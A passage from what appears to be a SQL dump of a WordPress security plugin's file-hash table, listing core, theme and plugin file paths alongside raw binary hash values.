l��6���Zi�R','',0,'?'),('Y��EM�K����G�`','wp-content/themes/vision-lite/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��ֹO�v#0�f��D','@��LfW���>X`�\0Q㾲�B�K.!�G','',0,'?'),('Y�UL�5J�ޔ�v[�','wp-includes/rest-api/search/class-wp-rest-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��x&����{\n�x�\\','�sޢ���zj�λ�\'Ҳ���wE�?��','',0,'?'),('Y��\"�c&�^��T','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-buttonset-control.php',0,'F7�<�)��IC�r</�','F7�<�)��IC�r</�','js/�/8�0��,��|b�@�� B\"�.�*�O�','',0,'?'),('Y�>1�7{6\">�2f*�:','wp-content/plugins/wp-cerber/assets/flags/uy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','txd)b}PJ��kJ@�8',' �ꬬ0�b���\0J��dczE�!(C��P','',0,'?'),('Z��b�OD?��D�','wp-content/themes/regina-lite/layout/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�T�xyb�A���$','xČ�ؾy�>1�P褵��i�6�(���[��','',0,'?'),('Z\'�$\'z��d;�>��C','wp-content/themes/healing-touch/change_log.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g藨T��C��ˠ}','X�u[���OM��xn�5�|p@��T�!+','',0,'?'),('Z4<n?e�����','wp-content/plugins/wordfence/lib/wfConfig.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����k�P$f��','�ڷ�s,9��a�a�8�ˬ�<�+��p�ql�','',0,'?'),('Z9���}.��J��k=�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8I��\Z\n�ӣ�','i>z���R�@������k�W��6u�k�y�','',0,'?'),('ZD�:-h�${�ma�','wp-content/plugins/wordfence/images/sort_desc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?զ�)X�?�N�','b�EԚ�B�#:�(�#�=_(�\Z���|��U�#�','',0,'?'),('ZP�e2I�� ��[͠�','wp-content/themes/twentytwentyone/assets/sass/07-utilities/a11y.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ТWHKC�}��&�%��','��$�FT���~K�K�`��e�c=��;���;','',0,'?'),('ZY�<}���*a�F���','wp-content/plugins/wp-cerber/assets/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��:d�b���EF�R','��z��kG��� �A�Kyh��b��a��h','',0,'?'),('Z[^�&s3 �f��l','wp-content/themes/advance/inc/kirki/assets/js/reset.js',0,'��\"�D��z��ؒ^','��\"�D��z��ؒ^','v��aAkP��TrBC^z��(piB�i��k:�','',0,'?'),('Zi�D(��g�ǣϑE','wp-content/themes/advance/inc/kirki/includes/class-kirki-scripts-registry.php',0,'�<CX-�脄�eg�h`','�<CX-�脄�eg�h`','+��W�<J�&�Fy�MRő���e���X','',0,'?'),('Zp_Z JI����q�m`','wp-content/plugins/wp-cerber/assets/flags/pa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�Y]�v\"���','���.oC���]1%�lЕ�Ul��\Z������#','',0,'?'),('Zu�;�Z��cd��XJ�','wp-content/plugins/redirection/fileio/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=s��8�\Z���� ��H','T�I�8g\'�]���m����Ԑq�:�����I','',0,'?'),('Zx��1�2K�Z�,��','wp-includes/customize/class-wp-customize-header-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�\0W>$����l�^ҳ','Qy(u�&���v�ӳ\'-�}�hՒ��X��t�','',0,'?'),('ZҌ�[��\nv��� F','wp-includes/SimplePie/gzdecode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��rF<�\ZiǨu��','|��R\'gAE�ێ���q��q�T!��:�O0�_','',0,'?'),('Z�_\"��~�J�����','wp-includes/js/wp-custom-header.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KO��x �3��y;9�','��X$A���\r\"N��e�$ߦ��+���L(','',0,'?'),('Z�~Y/l����*�&�','wp-content/plugins/wp-cerber/assets/flags/vn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f6J%��C���v,\nc','�_���1:�L��v�Q��ܺ�.����|','',0,'?'),('Z��я�ݒ��S�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\Z^Z�HG�%�O�','�m���c�;�\ny㐲��0,�5���F|=�C','',0,'?'),('Z����� %/�Z�z9��','wp-admin/includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/a�ag�����','�� T+�ݟ���v$L�3���G��!�j��','',0,'?'),('Z�\0��Y���� æfg','wp-includes/js/crop/marqueeVert.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0���9��R���','K�cg$�e���2\\p�$�1z�����`CkJ�','',0,'?'),('Z�u=�7��0�','wp-content/themes/twentytwentyone/assets/sass/03-generic/vertical-margins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>�����y��','�+a�R�\"�͋kDxgd]��h���E�_#','',0,'?'),('Z�R���r(�&b��:�-','wp-includes/css/dist/format-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6���F۔�\'�V��','�h�}����]�ާ֚��$_8Znyi�E�4V����','',0,'?'),('Z��=ӧ�rc\"��y�','wp-includes/IXR/class-IXR-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��VdB+A�J?��#','��{~�(#�\Z6u����,����?�jk2��`','',0,'?'),('[̉��$���\'��','wp-content/themes/twentynineteen/sass/navigation/_next-previous.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ɚ�u\\ ���','c�V�����x�y(#il8L}e��','',0,'?'),('[�G���e�a\'�i��','wp-includes/js/jquery/ui/datepicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4P1,ٝ�`x����','�]w\'��d�<s��6�>4Sڭ���s��/�=��','',0,'?'),('[\'L�F�d�+���k','wp-content/plugins/wp-cerber/assets/flags/li.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�f�9�%��QZ!�;','�`A��/�\\) 5/�����簤��GJ���`�','',0,'?'),('[5���Y�Nh���K�M�','wp-includes/customize/class-wp-widget-area-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<w܌*�t���!�','44�w�Vv�Oa5G��39��I����=�5��i','',0,'?'),('[w�[ᄅ�\r |2I�)','wp-content/plugins/wp-cerber/assets/flags/hu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C��.F��L\nc��Q','�g.XaMw�Ma-#lW���=���h��1�U�h','',0,'?'),('[��#ܧ\Z>]��<�','wp-admin/css/colors/ectoplasm/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1/�?n�.�EL�-��','t$�yC�\0.J���.�O��}��\"g�=�','',0,'?'),('[�>�x�;�wn/t�H','wp-includes/js/wp-emoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+g�D>�w�f�م*�D','M�aF��$�*�M��_�����n8���v�u�','',0,'?'),('[��$c�qr��9h���','wp-content/plugins/wordfence/js/jquery.qrcode.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),('[���1�YAdk�,','wp-includes/SimplePie/Sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�l����fp��x��','���O\nQp���5�A�~������j��xt�','',0,'?'),('[�Y��44�Or��l0�','wp-includes/Requests/Exception/HTTP/414.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]U�@���)��#h','��H������i���c�!��I).eh������','',0,'?'),('[ꠏ�|K�o�یb7�','wp-admin/user/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xCS6�LC�2!�u�','�`K����y2M��plξ\"a\0אּ�t�ޡD','',0,'?'),('\\�%�?�>����e8','wp-includes/class-wp-block-pattern-categories-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T��i���詿/�!','��(Y�E�U��<d�y���K 2�bsy�Z�L�','',0,'?'),('\\�>8��&;��~_�','wp-content/themes/wp-barrister/library/images/icon-tel.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�)��u�z�?��','݇���#��s�AG��ɧ���D�\\��`�R','',0,'?'),('\\�����9�����','wp-admin/ms-upgrade-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qc��8���E�%��!',' �H�_c��Q�X��̤�ՏLs�ڭ�','',0,'?'),('\\@jg��W�~x^%�t:','wp-content/themes/weblog/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Dy6\Zk�Ԧ6pm','�\"���P�UTY6���tͰi�|Ov=','',0,'?'),('\\H���:��u3�%�Fw','wp-content/plugins/wordfence/views/waf/waf-install-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�2�H���$�\n�','5�(�/��PhJS�Z\"&]}���r�Ip�(�-t��','',0,'?'),('\\[��i%Ͱ<��e�>�','wp-includes/css/wp-pointer-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b;���f�J-�',' \0��Drá�)�\Z�k��y�Q��h�q�.\nCK','',0,'?'),('\\`�\naW���U�v=a�','wp-content/themes/doctors/core/contents/loop_category/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L2�?Q��@�Ƞ�z','L��f�X,f�������b0��T�i� 4%\"�','',0,'?'),('\\e����i-��-�e','wp-content/plugins/redirection/redirection-strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���]Cѝ���b','���T��W�װj;O͕�E�IO/�]Z��','',0,'?'),('\\���k����w_� ','wp-content/themes/healing-touch/images/social/twitt.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����[ӡ�~�܍�w','R£@�@\r.�u��aS/)$�ˌy��b���U','',0,'?'),('\\��\'���!E+���[\08','wp-content/themes/regina-lite/layout/css/mobile.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Zi �0+��]�','m�a���k#�����6�l��\0:�>#����.','',0,'?'),('\\���mՀ����;�','wp-content/plugins/wp-cerber/assets/flags/eg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�֙�x�8��\0 ','�_�ih��<�[������Ns�D}?\'��C�Y','',0,'?'),('\\������7���Q�o','wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('\\����)b�Q�j�����','wp-content/themes/doctors/core/customizer/help/custom_control_text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7]�0�n�9�AT�','����1,��L\n0�\npO���:�n��','',0,'?'),('\\�т�?$�̈́8����','wp-admin/includes/dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ê��m\Z�E��Y��.','&����3��eſ�.��(���{��T�Cv.','',0,'?'),('\\��u�]�A%� �','wp-content/themes/twentytwenty/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�*����� ','4\nO�ҩ��i����;Vt6\'�@1I�ȋ�W','',0,'?'),('\\���9I���Ow��','wp-content/themes/vision-lite/no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{i� �B����`','\n\r�k:�q7J��uG�zRowUl��lh','',0,'?'),('\\�\0��>�+���Fb��','wp-admin/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U��:#�+a���F','�C���f��`���]����|#wVÉBH)\r','',0,'?'),('\\ֶ�S��\n��P�:�','wp-content/themes/twentynineteen/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��8v�D����','�N�1����1�swR�������������','',0,'?'),('\\�\Z�V�]�\'G �ȋ�','wp-content/themes/regina-lite/inc/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���֭�*e����Ƶ`','U�,��=�Z�j�ߵ�^{C�ʷ%�i���H�2��','',0,'?'),(']&��A��!�S�K>�','wp-content/themes/twentytwentyone/assets/images/Reading.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�*���|).��h','��Q�-:�ñ��1Z��ŴCxʞ�dd;Z�b�^','',0,'?'),('](R�&!��1;�3��','wp-includes/js/wp-ajax-response.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�Hme_\Z��!5','��c�����z�2�~;~�D��*T�?�&�','',0,'?'),(']9.�pe���T���','wp-content/themes/twentynineteen/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'&iɴ�G��x��Rl:','�JÂ���W�S��\"�V�JZɌM�ڛ�D','',0,'?'),(']9OUâ��\n��V','wp-content/plugins/wordfence/js/admin.liveTraffic.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڗU�_|�$>���7','wR�u�sXq��s�a�OFvQ�y�Ł#���','',0,'?'),(']?�v$5:th����xL','wp-content/themes/vision-lite/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B^Ȕ\\�5�k�)���','��Zd��[FX������2@\0R�rX�z��~','',0,'?'),(']B#�2�z��bU��/','wp-includes/Text/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r� \ZV���:��','�N\'�u�p���=Z�\"-��K����r','',0,'?'),(']L0���eE�\"u� ��','wp-includes/js/mediaelement/mediaelement-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OAZ�n�\0��?!*�W�','q�{2�fX�����JgXC����c�Y�3��','',0,'?'),(']x��6�a�[�|��','wp-content/plugins/wp-cerber/assets/flags/sl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nU�r�̨�^̧\0�','h�+ѩEfp��\Z��tт�5�X���T:�K�6','',0,'?'),(']����ΰ��m','wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2������j�^��!��','��)秐=�l2^m�\r���uV20�ژM{�','',0,'?'),(']���N��Jjӎe���','wp-includes/widgets/class-wp-widget-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�����O���\\��','�b�Z�r��A��{�_���d���5|','',0,'?'),(']���r�:@��I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6:����2kP3���','%u���Mp����,.\0�@�Zq��r��/���Q','',0,'?'),(']����,�� �K��uQw','wp-content/themes/healing-touch/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�=Bn��a�|�m','p�_6vq�n{�yC1��ΘRs�W�6����e','',0,'?'),(']��P���Tkvt��8A','wp-admin/network/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ż\Z�=>� ɱ�l�','y�TQmU��z�D��s�g���1^T\"�ig�I','',0,'?'),(']���*������J�','wp-content/plugins/wordfence/images/icons/email_go.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��E��H)�.��','��& �qC1QU�_.O��3����1!&��۴��','',0,'?'),(']����\"}[�Y�R�','wp-admin/css/edit-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H7g���8Y�y�','��Ϛ����Z:��J�Dz��#y04�?','',0,'?'),(']�u$�4R�6���','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-section-repeater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@߉px�I!�8�)','����\"�Nj�{�,�8[h6W�ي���','',0,'?'),(']�D�d���3��3�t�','wp-content/plugins/wp-cerber/assets/flags/hr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZO��e.��.�o','e��T��\\��B;vu��!�\0~\" P��;�','',0,'?'),(']�+��ɾ[��� �','wp-content/themes/healthcare/post-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��JB\Z{����','\0�����#wcv1�X�`���\"�CF�<����,','',0,'?'),('^�4�j�|��I��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�H*f��$��ʝӐ','���Ɲic�z�P��1�\"ݢӛo�TWry�*F','',0,'?'),('^\0\rc����ђd�','wp-content/themes/healing-touch/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rΑ�Jb����Ȝ��w','xbm�FR�0�Z�v��\Z�����q�\0��]','',0,'?'),('^(�?�t�p���,$�','wp-includes/block-patterns/large-header-button.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\r��\Z�&o�r\'���','\0�9�w�i����5�������}���h��','',0,'?'),('^)�r\"ZυPT�:���','wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property-font-family.php',0,'�NO�.��e�2 a���','�NO�.��e�2 a���','��H�Χb\\/�q@����A�RR\"\"�p�!>��','',0,'?'),('^8?���VZ=;�>$','wp-content/themes/doctors/images/demo/blog_2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vj[T��]�<OP�','�u�-(\'V���[f��$&���S�~','',0,'?'),('^9(-(Ų�y ���0q*','wp-admin/user/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�N ����9�3nDl','r���R89�<�;9i1l�Z���Q��oC#�Y��','',0,'?'),('^@ղ{\'��_���92','wp-admin/upgrade-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[a�@1.��Q��Z','�tˁ�����9{��/��y�g1\'�uV��l�','',0,'?'),('^H\0�B|��4�@z��','wp-includes/IXR/class-IXR-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g6\"���u\\\'3����b�','*?�ۧU�=�?�,]��0=C����Z-�6Dq.�G','',0,'?'),('^U�.i��ypG���','wp-includes/js/mediaelement/mediaelementplayer-legacy.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�V�t�Fƣ���','�2�q{Y�*lX�[q�kd���}�Jp�����','',0,'?'),('^d?e��.o���ʨ�L','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-below-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�C�=sy3�L���','�_��o3�t�Y��_o��f2k#��0�6Ps;','',0,'?'),('^yG=ڜFg;3�á�','wp-content/plugins/wordfence/images/button-grad-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��RC���Ty�?�','D����H�~����Ϩ�P�_�{�!��','',0,'?'),('^�Ð��+�y|�','wp-includes/images/crystal/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�9�Т1�T��n��','e\rC��i0��[��R�8@���G���aJN�','',0,'?'),('^�ZG:��}\"E��**$','wp-content/plugins/redirection/api/api-log.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Z� �_�f\02=1','�x;��,m=�T#\\\Z��3�uX9�Q�`8��*K�','',0,'?'),('^�d�Y�t08h.�����','wp-content/themes/doctors/template-leftSidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�Úc��=���\n��2','��z�\0y�1&�\rp�g9��;�e����:G','',0,'?'),('^��2�7}�����I��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^ь�����{�O�','vZ���d¥���bNpz04\\��\ZL��I��v�','',0,'?'),('^��u�u��W�d�M=�','wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=E�o0��[�','�m?\Z�\"�g��=�0�N\"��Q��`�u\'��~I','',0,'?'),('^ǿ��+C%K��x�','wp-content/themes/twentytwentyone/template-parts/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���� ,��*]�1�n','���0CfIΰa����BqG�8��O�u>�Wþ','',0,'?'),('^�U�X��\00vp�|S','wp-content/themes/doctors/core/contents/loop_single/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�S4�XR��n�]\'','��#�w�\'P���&�K�P��2��)SOS�','',0,'?'),('^�^\\Q��=(w��','wp-includes/js/imagesloaded.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Vu+sf5�i����','����4H��1�Pc���)C6c�D�aHum\Z#cV','',0,'?'),('^�\r6&�ҖF;��oB','wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P%S�%<��?�\Z��\\','gO�:!��rh��ʀ6�\'wf��D���z�','',0,'?'),('_�\0��d �MP~��D','wp-includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pق�g�OVjX�����','�4k�B�3S��������\"���\ZBG�ǎ\0KV','',0,'?'),('_�k4�!*}��݄ ','wp-content/plugins/wordfence/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����|%��*T*�`�','�����289v�u3�n C2�s��va/�','',0,'?'),('_*�⽞L�0�>\r','wp-includes/feed-rss2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lN+�5 ��O?','�@!�`C��*Me��z�j@ �@���L�jw�','',0,'?'),('_�#��U1p�GS�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���rt��w��(�e','�ҿD�I<�^�i2dW�]G�_�-+�A8�W','',0,'?'),('_/dyY�\r�}$ʓ��','wp-content/plugins/wp-cerber/assets/flags/ni.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0�MZsu���/��','�Cd0���HF|�\ne��ʅ�p�_�SӲ@\0@1<ۊ','',0,'?'),('_B��\0��r�p�Iu��','wp-content/themes/twentynineteen/sass/variables-site/_structure.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�!��Y�r8ܗt/�','=�\0t��d\n�J��e�ܐ��Z<��s�n6��t�','',0,'?'),('_j��_��/���yӱ','wp-includes/load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x8�7n�LH�g�gf�R','ŗْl5�������Xt�����C�\n�mA','',0,'?'),('_�f�>��*��_\n','wp-content/plugins/wp-cerber/assets/flags/ru.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q���j�/�53\r�','�z\rf�/���x�.��5Q&i�HCn�0�','',0,'?'),('_��[��_=�jr+�\Z\rA','wp-content/themes/advance/inc/kirki/includes/class-kirki-explode-background-field.php',0,'N�P^�O�\'��zf��n','N�P^�O�\'��zf��n','dD@w��C��v��ELgR��_��TF�?DWu','',0,'?'),('_�O�$^����5��','wp-content/plugins/wp-cerber/assets/ui-stack.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#`LZ)�pd��','Ɉ���H���R�{(~\0*8���!�^�u�','',0,'?'),('_�|��T�M^���J','wp-includes/css/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p^�,f�ޡ�����I{�','��i�4�j�v�J5�d���߲TP��L�/��7�','',0,'?'),('_��4�3���=��','wp-includes/images/uploader-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\M�����m��','�p����+/������i��!Z�ţ6�m�','',0,'?'),('_�o�^�M�_�ѧ;`A�','wp-content/themes/healing-touch/images/mobile_nav_right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I����Y#��&٩O','/E��tX`6�G�>�EPx>�k�[�E���','',0,'?'),('_�(�C���M6�9�','wp-admin/includes/class-wp-links-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�6�Z3@][:����+','A���D��c?��L���I�OB��Oß��L','',0,'?'),('_����8}���?�','wp-includes/css/media-views-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���X�Н�KH�Os8�',')�Z\\��^��hG*y����2Ԏ�k]䜹Yu�5*','',0,'?'),('`��S�`NI�^G�','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�i@�G�g��0�p','G��<�/�14Ņ�L��5�������!','',0,'?'),('`%�ֽ�j��\'��P��','wp-admin/js/edit-comments.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0K@�n��d�Œ�Ψ�','��-(j�e�Q5���3��\0`NJ�b�(OS�:b','',0,'?'),('`5�ƙy�5_P�XI�','wp-content/plugins/redirection/locale/redirection-zh_TW.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�B�������4','�sL\'���濔J%�ă��øs[�lI~','',0,'?'),('`��o�\'�c?��/ �','wp-content/themes/twentynineteen/template-parts/header/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�-�mם�]�','�I\Z�{��!��M}OL�bdpO���hV�Û�','',0,'?'),('`��gf�W�\n&OPw','wp-content/plugins/wp-cerber/assets/flags/sg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*F��Y����K� a','Ԩ��Vm�f��Ek$��;]N_q�^�4����(�','',0,'?'),('`��\n���2����','wp-admin/css/code-editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V��DBQVgF','w��86=�ݔ����2�\rD%V��E5�S� �T�','',0,'?'),('`�[��$a��[�RO��','wp-content/plugins/redirection/models/importer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��o�~�bS0�B\Z8�','��H�<�_)��\n�g�?�8�p-n{7rr�;7','',0,'?'),('`���#��Q�?>6)','wp-content/plugins/wp-cerber/assets/flags/fk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�OwB<����oa9�E�','�k��؊�2��M&C9�&0d�Hl��q~9q','',0,'?'),('`�a�(�g��\"��','wp-includes/js/dist/html-entities.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�@؇\0����)','�_Z�#W�șf�X���c�B���`��dQfH�,','',0,'?'),('`�c0���\\���3�','wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' >�U6ƪg��v�f','R�&sX$6#���_��ν�J�|�b0�o','',0,'?'),('`�)��E\'����i�A','wp-content/themes/skt-toothy/no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7]\'(Z�Qߣ','K�U#5�Q{\Z��\'^i��l�]�:4��)�7�','',0,'?'),('`���;�\"�-���+~;','wp-includes/js/tinymce/plugins/media/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#@,�4dG��M','XHx����0�֍X�\Z���OG��|�{�F2','',0,'?'),('`�}+�6�L-q[��$','wp-includes/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1�`���0�����','�qƖ����%/�y�g�rwÛ�\r�LR>=Y','',0,'?'),('`��U�2���mdW','wp-includes/class-wp-customize-nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�8û�Td�h9�\Z','��g�n\\�y|�TR�xF����\\��A��&7֏�d','',0,'?'),('a�)6����ю�','wp-includes/js/plupload/moxie.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#C\r��5DZ�ǒ����','����I�9_/x�t5���(�.g�tT\Z}&���','',0,'?'),('a)�TMW�Oo��Q�|�','wp-admin/images/media-button.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6@p�z^ye��','_\Z���SjזY 